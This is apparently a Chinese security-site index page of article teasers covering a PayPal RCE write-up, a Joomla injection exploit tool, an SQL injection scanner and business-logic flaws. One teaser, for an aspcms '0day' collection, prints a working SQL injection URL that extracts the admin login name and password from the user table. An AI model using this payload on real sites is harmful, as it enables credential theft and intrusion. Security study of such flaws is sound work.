51工具盒子
安全客2019季刊第三季 : 政企安全一漏洞运营与管理
**[![安全客2019季刊第三季 : 政企安全一漏洞运营与管理_https://www.tiejiang.org_线下沙龙_第1张](http://static.51tbox.com/static/2024-12-22/col/a83fe7835a9d33adc885f07e0ba074b7/a60623e16ef14705b78af6160fe4071b.png.jpg &...
日常运维
做到这5点,安全开发让你的应用不再漏洞百出
如今,安全威胁的破坏力正以前所未有的速度随着信息化程度的加深而增长,扩大构建数字化业务通常会导致更大的受攻击面。要应对当前和未来的安全威胁,只依靠传统的安全产品投入已显得力不从心,除了购买安全产品,更重要的是安全意识的增强和安全流程的建设。在各种安全建设方案中,"安全能力前置"是明显的趋势。就像一幢建造时地基不稳、墙体不牢、地板塌陷的房子无法在建成后依靠几根...
360Bug Cloud开源漏洞响应平台
360Bug Cloud开源漏洞响应平台 ------正式上线------ ------------------------------------- 漏洞提交地址:bugcloud.360.cn 上线时间:2019.10.18正式上线 
<br /> : 前奏,发现appstore搜索排行榜有个街机游戏机\~然后就[下载](https://51tbox.com/)下来玩玩, 第一次登录,送了2k金币。。好少,啥都不玩的。里面有个抓娃娃。。。玩玩看,头几次抓到了,后面打死也抓不到,尼玛,怒了。 <br /> 话说这个问题到底算是支付宝的还是游戏的?...
PayPal 远程代码执行漏洞
原文:[http://artsploit.blogspot.com/2016/01/paypal-rce.html](https://51tbox.com/) 在去年12月国外安全研究员发现了一个manager.paypal.com的java序列化漏洞并报告给了paypal进行修复. 这个漏洞异于之前大家发的weblogic jboss websphere等序列化漏洞,...
CVE-2015-7857 Joomla注入漏洞利用工具
文中提及的部分技术、工具可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用! Joomla是一套获得过多个奖项的内容管理系统(Content Management System,CMS),它采用PHP+MySQL数据库开发,可以运行在Linux、Windows、MacOSX、Solaris等多种平台上。除了具有新闻/文章管理、文档/图片管理、网站布局设置、模板/主题管理...
aspcms各版本漏洞0day集合
admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1 ----------...
GourdScan分布式被动注入漏洞扫描工具
**GourdScan** 之前俩个轮子中的一个的升级版,谈不上神器。 谈谈升级了哪些: 1.更新了代理的方式,抛弃了占用内存极高的burp,采用了tornado进行代理,缺点是暂不支持https的代理。 2.更新了测试的逻辑,不会因为sqlmapapi的出错导致代理的挂起。 3.添加了分布式的支持,其实也就是通过mysql查询出正在运行任务最少的机器进行返...
业务安全漏洞挖掘归纳总结
0x00 索引说明 ========= *** ** * ** *** 6.30在OWASP的分享,关于业务安全的漏洞检测模型。进一步的延伸科普。  [密码找回功能可能存在的问题(补充)](http://drops.wooyun.org/web/3295) 距离上两篇文档过去近半年了,最近整理密码找回的脑图,翻开收集的案例...
